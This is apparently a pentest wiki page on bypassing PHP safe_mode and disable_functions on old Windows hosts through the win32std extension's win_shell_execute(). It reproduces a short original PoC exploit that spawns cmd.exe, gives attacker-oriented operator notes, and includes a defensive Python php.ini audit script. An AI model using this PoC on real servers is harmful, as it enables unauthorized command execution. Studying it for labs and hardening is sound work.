PHP 5.2.3 - Win32std ext Protections Bypass

{{#include ../../../../banners/hacktricks-training.md}}

This is a legacy Windows-only bypass that depends on the old win32std PECL extension exposing win_shell_execute(). It is useful in CTFs, old appliances, and abandoned shared-hosting stacks, but it is not a generic modern disable_functions bypass.

Why it works

disable_functions only blocks the PHP internals explicitly listed in php.ini. If a third-party extension exposes a helper that eventually reaches the OS itself, that helper is outside the disabled built-in function set unless the admin also removes the extension or blocks that exact entry point.

In this case, the primitive is:

win_shell_execute("..\\..\\..\\..\\windows\\system32\\cmd.exe");

The old win32std extension documented win_shell_execute(string absolute_path[, string action, string args, string dir]) as a wrapper around normal Windows shell actions. In practice, on vulnerable legacy installs this gives you a process-spawning primitive even if common functions such as system() were disabled.
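An offline check for the gap described above, added here as an example (it is not code from this page or from the win32std project): it parses a php.ini, assumes a small table of extension entry points worth disabling, and reports any that are loaded but absent from disable_functions. The sample php.ini texts are constructed.

```python
import re

# Extension entry points that reach the OS and must be listed in
# disable_functions if the extension stays loaded. Only win32std's
# win_shell_execute() is covered here, as on this page (assumed table).
RISKY_EXTENSION_FUNCTIONS = {"win32std": {"win_shell_execute"}}

def parse_php_ini(text):
    """Return (loaded_extensions, disabled_functions) parsed from php.ini text."""
    extensions, disabled = set(), set()
    for raw in text.splitlines():
        line = raw.split(";", 1)[0].strip()  # drop ';' comments
        if "=" not in line:
            continue
        key, value = (part.strip() for part in line.split("=", 1))
        key, value = key.lower(), value.strip('"')
        if key == "extension":  # normalise 'ext/php_win32std.dll' -> 'win32std'
            name = re.split(r"[\\/]", value)[-1]
            name = re.sub(r"^php_|\.(dll|so)$", "", name, flags=re.IGNORECASE)
            extensions.add(name.lower())
        elif key == "disable_functions":
            disabled.update(f.strip().lower() for f in value.split(",") if f.strip())
    return extensions, disabled

def audit_php_ini(text):
    """List risky extension functions that are loaded but not disabled."""
    extensions, disabled = parse_php_ini(text)
    findings = []
    for ext, funcs in RISKY_EXTENSION_FUNCTIONS.items():
        if ext in extensions:
            findings.extend(sorted(funcs - disabled))
    return findings

# Constructed php.ini mirroring the PoC's setup: only system() is disabled.
WEAK_INI = """safe_mode = On
extension_dir = "./ext"
extension = php_win32std.dll
disable_functions = system
"""

# Constructed hardened variant: the extension's entry point is listed too
# (removing the extension= line altogether is the stronger fix).
HARDENED_INI = WEAK_INI.replace(
    "disable_functions = system",
    "disable_functions = system,exec,shell_exec,passthru,popen,proc_open,win_shell_execute",
)

print("weak:", audit_php_ini(WEAK_INI))          # ['win_shell_execute']
print("hardened:", audit_php_ini(HARDENED_INI))  # []
```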

Preconditions

  • Windows target
  • Very old PHP branch where safe_mode still existed
  • win32std PECL extension loaded
  • The hosting context must allow the spawned process to start under the web server account

Practical notes:

  • The original PoC was tested on PHP 5.2.3 / Windows XP SP2.
  • This technique is mostly relevant when you see phpinfo() output or an extension list containing win32std.
  • Do not assume modern community forks behave the same way. Some recent rebases keep resource/helper APIs but no longer expose win_shell_execute(), so the primitive is tied to the older extension line.

Original PoC

From http://blog.safebuff.com/2016/05/06/disable-functions-bypass/

```php
<?php
//PHP 5.2.3 win32std extension safe_mode and disable_functions protections bypass

//author: shinnai
//mail: shinnai[at]autistici[dot]org
//site: http://shinnai.altervista.org

//Tested on XP Pro SP2 fully patched, worked both from the CLI and on Apache

//Thanks to rgod for all his precious advice :)

//I set php.ini in this way:
//safe_mode = On
//disable_functions = system
//if you launch the exploit from the CLI, cmd.exe will be executed
//if you browse it through Apache, you'll see a new cmd.exe process activated in Task Manager

if (!extension_loaded("win32std")) die("win32std extension required!");
system("cmd.exe"); //just to be sure that protections work well
win_shell_execute("..\\..\\..\\..\\windows\\system32\\cmd.exe");
?>
```

Operator notes

  • The line system("cmd.exe"); in the PoC is only a sanity check to show that the normal built-in execution function is blocked. The actual bypass is the subsequent win_shell_execute() call.
  • The relative path to cmd.exe is a convenience trick for old deployments. If you already know an absolute path, prefer passing it directly.
  • This is primarily a process execution primitive. If you need a broader survey of newer disable_functions / open_basedir bypasses, go back to the parent page:

{{#ref}}
README.md
{{#endref}}

Constraints

  • Legacy only: safe_mode disappeared in later PHP branches, so this page is mainly useful for historical targets and labs.
  • Extension dependent: without win32std, there is no bypass here.
  • Windows only: this has no value on Linux/*nix targets.

{{#include ../../../../banners/hacktricks-training.md}}